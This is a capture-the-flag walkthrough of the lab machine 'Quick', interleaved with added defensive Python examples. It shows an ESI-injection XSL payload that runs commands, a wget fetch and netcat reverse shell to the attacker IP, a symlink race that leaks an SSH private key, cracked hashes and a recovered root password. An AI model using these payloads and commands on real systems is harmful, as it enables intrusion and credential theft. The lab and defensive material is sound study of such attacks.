NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 15:12 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating Ping Scan at 15:12
Scanning 10.10.10.186 [4 ports]
Completed Ping Scan at 15:12, 0.54s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:12
Scanning quick.htb (10.10.10.186) [1000 ports]
Discovered open port 22/tcp on 10.10.10.186
Discovered open port 9001/tcp on 10.10.10.186
Completed SYN Stealth Scan at 15:12, 3.20s elapsed (1000 total ports)
Initiating Service scan at 15:12
Scanning 2 services on quick.htb (10.10.10.186)
Completed Service scan at 15:12, 12.20s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against quick.htb (10.10.10.186)
Retrying OS detection (try #2) against quick.htb (10.10.10.186)
Retrying OS detection (try #3) against quick.htb (10.10.10.186)
Retrying OS detection (try #4) against quick.htb (10.10.10.186)
Retrying OS detection (try #5) against quick.htb (10.10.10.186)
Initiating Traceroute at 15:12
Completed Traceroute at 15:12, 0.61s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:12
Completed Parallel DNS resolution of 2 hosts. at 15:12, 0.61s elapsed
NSE: Script scanning 10.10.10.186.
Initiating NSE at 15:12
Completed NSE at 15:13, 30.88s elapsed
Initiating NSE at 15:13
Completed NSE at 15:14, 60.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Nmap scan report for quick.htb (10.10.10.186)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 6.804 days (since Fri Jul 17 19:56:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   607.59 ms 10.10.14.1
2   607.72 ms quick.htb (10.10.10.186)
NSE: Script Post-scanning.
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.03 seconds
Raw packets sent: 1130 (53.928KB) | Rcvd: 1089 (48.609KB)
PORT 9001 ENUMERATION
LOGIN PAGE:
Here we have a portal link which we cannot access directly, so to access it we need to use the http3-client from QUICHE.
With that client we can access the portal as shown below:
┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb
<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}
li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}
/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>
Here we have a directory named DOCS, which we will access now:
┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb?view=docs
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>
So let's get this PDF:
┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb/docs/Connectivity.pdf > Connectivity.pdf
In this PDF we have a password, but to log in we also need an email address.
We have some names and companies in the TESTIMONIALS and CLIENTS sections.
So we will create 3 wordlists: names, company and TLD (top-level domain).
After that we will use this script, made by me:
#!/bin/bash
# Combine every name, company and TLD into name@company.tld
for i in $(cat clients.txt)
do
  for j in $(cat company.txt)
  do
    for k in $(cat tld.txt)
    do
      echo "$i@$j.$k"
    done
  done
done
From this we get our list of emails, and after fuzzing through every email we get our valid one. For the fuzzing I tried it in BURP SUITE.
Elisa@Wink.co.uk : Quick4cc3$$
After logging in with these credentials we will see the SEARCH and RAISE TICKET options.
We will first send this through Burp, where we will see ESIGATE in the response; after searching we will see that it can be exploited.
In the picture above we see that we have ESIGATE, so to understand this we have the exploit here:
https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/
Here we have to create 2 files, an XML and an XSL, which we will reference through this tag:
<esi:include src="http://10.10.14.90/b.xml" stylesheet="http://10.10.14.90/a.xsl"> </esi:include>
After sending it in the description field we raise the ticket, which gives us a ticket number; entering that ticket number in the search bar triggers it.
b.xml will be empty and a.xsl will contain the main code:
<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[touch /tmp/pwned]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>
Here we just have to change the data in this part: [CDATA[touch /tmp/pwned]]
We will send the request 3 times; remember to change both the XSL and XML file names every time. We also need our Python server running on port 80 so that the target can fetch and execute this payload.
[CDATA[wget http://10.10.14.90/nc]] --> nc from /usr/bin/nc
[CDATA[chmod +x nc]]
[CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]
The script will look like this:
<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>
Sending the data and triggering the ticket will look like this:
When we trigger the third ticket we will get our shell on netcat.
It will look like this:
┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.90] from (UNKNOWN) [10.10.10.186] 45588
id
uid=1000(sam) gid=1000(sam) groups=1000(sam)
pwd
/home/sam
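The ticket field is only dangerous because user text reaches the ESIGate proxy unescaped, so the <esi:include> tag is parsed instead of displayed. The following is an added example, not code from the original writeup or from ESIGate: a Python check that flags ESI tags in submitted text and HTML-encodes the text before output. The names find_esi_tags, neutralize and TRUSTED_HOSTS, and the sample inputs, are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Opening ESI tags such as <esi:include ...>, in any letter case.
ESI_TAG = re.compile(r"<\s*esi:([a-z]+)\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([a-zA-Z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")

# Hosts the application itself may include from (assumption for this example).
TRUSTED_HOSTS = {"portal.quick.htb"}


def find_esi_tags(text):
    """Return one finding per ESI tag present in user-supplied text."""
    findings = []
    for match in ESI_TAG.finditer(text):
        attrs = {k.lower(): (dq or sq) for k, dq, sq in ATTR.findall(match.group(2))}
        untrusted = []
        # src and stylesheet are the attributes used by the tag in this writeup.
        for name in ("src", "stylesheet"):
            host = urlsplit(attrs.get(name, "")).hostname
            if host and host not in TRUSTED_HOSTS:
                untrusted.append(name)
        findings.append({"tag": match.group(1).lower(), "untrusted_attrs": untrusted})
    return findings


def neutralize(text):
    """HTML-encode user text so no ESI tag survives into the response body."""
    return html.escape(text, quote=True)


# Constructed sample ticket descriptions (not taken from a real system).
SAMPLES = [
    "My router keeps rebooting every night.",
    '<esi:include src="http://192.0.2.10/b.xml" '
    'stylesheet="http://192.0.2.10/a.xsl"></esi:include>',
    "<ESI:Include SRC='/footer.html'/>",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        hits = find_esi_tags(sample)
        print(hits, "->", neutralize(sample) if hits else sample)
```

Encoding on output is the control that matters here; the tag finder is useful for alerting on stored tickets and request logs.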
So here I tried to get SSH keys by generating them there, but to get better access we generate SSH keys on our own machine and copy the public key to sam's authorized_keys after making the .ssh folder.
sam@quick:~/.ssh$ echo 'ssh-rsa <PUBLIC_KEY> root@liquid' > authorized_keys
GETTING USER ACCESS
We will just SSH into user SAM
┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsa sam@10.10.10.186
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Fri Jul 24 15:46:22 UTC 2020
  System load:  0.0                Users logged in:                1
  Usage of /:   30.4% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 17%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    135
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
54 packages can be updated.
28 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Mar 20 01:33:16 2020
sam@quick:~$ ls
esigate-distribution-5.2  nc  nc.exe  user.txt
sam@quick:~$ cat user.txt
650182418e93bf5a83d054b4841f3616
Now we will see that there is a file named mysql, and that MySQL is listening on localhost, so we may need to find its user and password.
Let's go to the /var/www folder, where we will see other interesting folders.
We will first look into the printer one, where db.php contains the password for MySQL:
"localhost","db_adm","db_p4ss","quick"
MYSQL
sam@quick:/var/www/printer$ mysql quick -u db_adm -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 276
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases
    -> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.00 sec)
mysql> use quick
Database changed
mysql> show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.00 sec)
mysql> select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
Here we have hashes; after decoding from MD5 and then DES we get:
e626d51f8fbfd1124fdea88396c35d05 > fajxXl5T9swMM > yl51pbx
So we have this password, but we need somewhere to use it, and for that we need to find out how the printer folder is served.
Here we will use the command apachectl -S, which gives the following output:
sam@quick:/var/www/printer$ apachectl -S
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
VirtualHost configuration:
*:80                   is a NameVirtualHost
         default server 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
         port 80 namevhost 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
         port 80 namevhost printerv2.quick.htb (/etc/apache2/sites-enabled/000-default.conf:30)
ServerRoot: "/etc/apache2"
Main DocumentRoot: "/var/www/html"
Main ErrorLog: "/var/log/apache2/error.log"
Mutex default: dir="/var/run/apache2/" mechanism=default
Mutex mpm-accept: using_defaults
Mutex watchdog-callback: using_defaults
PidFile: "/var/run/apache2/apache2.pid"
Define: DUMP_VHOSTS
Define: DUMP_RUN_CFG
User: name="www-data" id=33 not_used
Group: name="www-data" id=33 not_used
Here printerv2.quick.htb is listening on localhost, so we will port forward it to our machine and enumerate it.
To port forward we use the same SSH key with a small change in the command:
ssh -i id_rsa -L 80:127.0.0.1:80 sam@10.10.10.186
Here we will log in using the above email and password.
We will then check the job.php file, which takes an IP and PORT from the page, which looks like this:
Here we specify the IP and port where we will listen, because job.php takes the file from there and sends it to the netcat listener on that IP. This can be abused by pointing the file at srvadm's SSH key:
cd /var/www/jobs; while true; do for file in $(ls .); do rm -rf $file; ln -s /home/srvadm/.ssh/id_rsa $file; done done
Here I took help from my Discord friend.
This loop deletes every file in the jobs folder and creates a new one with the same name as a symlink to /home/srvadm/.ssh/id_rsa.
After that we will see this on our listener:
┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
Here we go with our SSH keys
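The key leaked because the job handler read whatever sat in /var/www/jobs, symlink or not. Added example in Python (not the box's job.php; the function names and the temporary directory layout are assumptions): opening job files with O_NOFOLLOW and checking the opened descriptor, so a swapped-in symlink is refused rather than followed.

```python
import os
import stat
import tempfile


class UnsafeJobFile(Exception):
    """Raised when a queued job file is not a plain file we should read."""


def read_job_file(jobs_dir, name, max_bytes=1 << 20):
    """Read one queued job without following symlinks planted in jobs_dir."""
    if os.path.basename(name) != name or name in ("", ".", ".."):
        raise UnsafeJobFile(f"bad job name: {name!r}")
    dir_fd = os.open(jobs_dir, os.O_RDONLY | os.O_DIRECTORY)
    try:
        try:
            # O_NOFOLLOW makes open() fail if the last path component is a
            # symlink, so there is no gap between a check and the open.
            flags = os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK
            fd = os.open(name, flags, dir_fd=dir_fd)
        except OSError as exc:
            raise UnsafeJobFile(f"refusing {name!r}: {exc.strerror}") from exc
        try:
            # fstat inspects the object actually opened, not the path.
            if not stat.S_ISREG(os.fstat(fd).st_mode):
                raise UnsafeJobFile(f"{name!r} is not a regular file")
            return os.read(fd, max_bytes)
        finally:
            os.close(fd)
    finally:
        os.close(dir_fd)


def demo():
    """Constructed scenario: one real job and one symlink to a 'secret'."""
    with tempfile.TemporaryDirectory() as root:
        jobs = os.path.join(root, "jobs")
        os.mkdir(jobs)
        secret = os.path.join(root, "secret_key")
        with open(secret, "w") as fh:
            fh.write("PRIVATE")
        with open(os.path.join(jobs, "job1"), "w") as fh:
            fh.write("print me")
        os.symlink(secret, os.path.join(jobs, "job2"))
        results = {"job1": read_job_file(jobs, "job1")}
        try:
            read_job_file(jobs, "job2")
            results["job2"] = "read"
        except UnsafeJobFile:
            results["job2"] = "refused"
        return results


if __name__ == "__main__":
    print(demo())
```

Refusing symlinks closes this path; a job directory that other local users cannot write to removes the race altogether.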
GETTING 2ND USER ACCESS
Let's SSH in as the user srvadm:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsaadmin srvadm@10.10.10.186
load pubkey "id_rsaadmin": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Fri Jul 24 18:07:20 UTC 2020
  System load:  0.0                Users logged in:                1
  Usage of /:   30.4% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 18%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    138
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
54 packages can be updated.
28 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jul 24 16:29:03 2020 from 10.10.14.90
srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm@quick:~$
Here we go With our 2nd user access
GETTING ROOT ACCESS
Here we don't have the password for this user,
so we will just check the files and folders in this directory,
from which we will get the password for root.
srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm@quick:~$ ls -la
total 36
drwxr-xr-x 6 srvadm srvadm 4096 Mar 20 06:37 .
drwxr-xr-x 4 root   root   4096 Mar 20 02:16 ..
lrwxrwxrwx 1 srvadm srvadm    9 Mar 20 02:38 .bash_history -> /dev/null
-rw-r--r-- 1 srvadm srvadm  220 Mar 20 02:16 .bash_logout
-rw-r--r-- 1 srvadm srvadm 3771 Mar 20 02:16 .bashrc
drwx------ 5 srvadm srvadm 4096 Mar 20 06:20 .cache
drwx------ 3 srvadm srvadm 4096 Mar 20 02:38 .gnupg
drwxrwxr-x 3 srvadm srvadm 4096 Mar 20 06:37 .local
-rw-r--r-- 1 srvadm srvadm  807 Mar 20 02:16 .profile
drwx------ 2 srvadm srvadm 4096 Mar 20 02:38 .ssh
srvadm@quick:~$ cd .cache/
srvadm@quick:~/.cache$ ls
conf.d  logs  motd.legal-displayed  packages
srvadm@quick:~/.cache$ cd conf.d/
srvadm@quick:~/.cache/conf.d$ ls
cupsd.conf  printers.conf
srvadm@quick:~/.cache/conf.d$ cat printers.conf
# Printer configuration file for CUPS v2.3.0
# Written by cupsd on 2020-02-18 17:11
# DO NOT EDIT THIS FILE WHEN CUPSD IS RUNNING
NextPrinterId 5
<------>
MakeModel KONICA MINOLTA C554SeriesPS(P)
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
State Idle
<------>
Here we have a string which looks URL encoded, so after decoding it we get a password:
%26ftQ4K3SGde8%3F >> &ftQ4K3SGde8?
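A DeviceURI with credentials in its userinfo part, as in the printers.conf above, is something an audit can find mechanically. Added example in Python (not part of the original writeup or of CUPS; the function names and the sample file contents are constructed for illustration): list every DeviceURI that embeds a password, reporting the account and host but never the secret.

```python
import os
import re
import stat
import tempfile
from urllib.parse import urlsplit, unquote

DEVICE_URI = re.compile(r"^\s*DeviceURI\s+(\S+)", re.MULTILINE)

# Constructed sample in the shape of a CUPS printers.conf (values are made up).
SAMPLE_CONF = """\
<Printer lobby>
MakeModel Example Model
DeviceURI https://svc%40example.test:p%26ss%3Fword@print.example.test/printer
State Idle
</Printer>
<Printer local>
DeviceURI ipp://192.0.2.20/ipp/print
State Idle
</Printer>
"""


def audit_printers_conf(path):
    """Report DeviceURI entries that carry credentials in the URI itself."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    for uri in DEVICE_URI.findall(text):
        parts = urlsplit(uri)
        if parts.password is None:
            continue  # no embedded secret in this URI
        findings.append({
            # The user name is percent-encoded in the file (%40 is "@").
            "user": unquote(parts.username or ""),
            "host": parts.hostname,
            # Never echo the secret; report only that one is present.
            "redacted_uri": f"{parts.scheme}://***@{parts.hostname}{parts.path}",
            "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
        })
    return findings


def demo():
    """Write the constructed sample to a temp file and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "printers.conf")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CONF)
        os.chmod(path, 0o644)
        return audit_printers_conf(path)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```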
LETS SU TO ROOT AND GET ROOT FLAG!
srvadm@quick:~/.cache/conf.d$ su root
Password:
root@quick:/home/srvadm/.cache/conf.d# cd
root@quick:~# pwd
/root
root@quick:~# id
uid=0(root) gid=0(root) groups=0(root)
root@quick:~# cat root.txt
6c11493e99685f709a1fc2ff03a4404a
root@quick:~#
Here we go with our root flag!!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE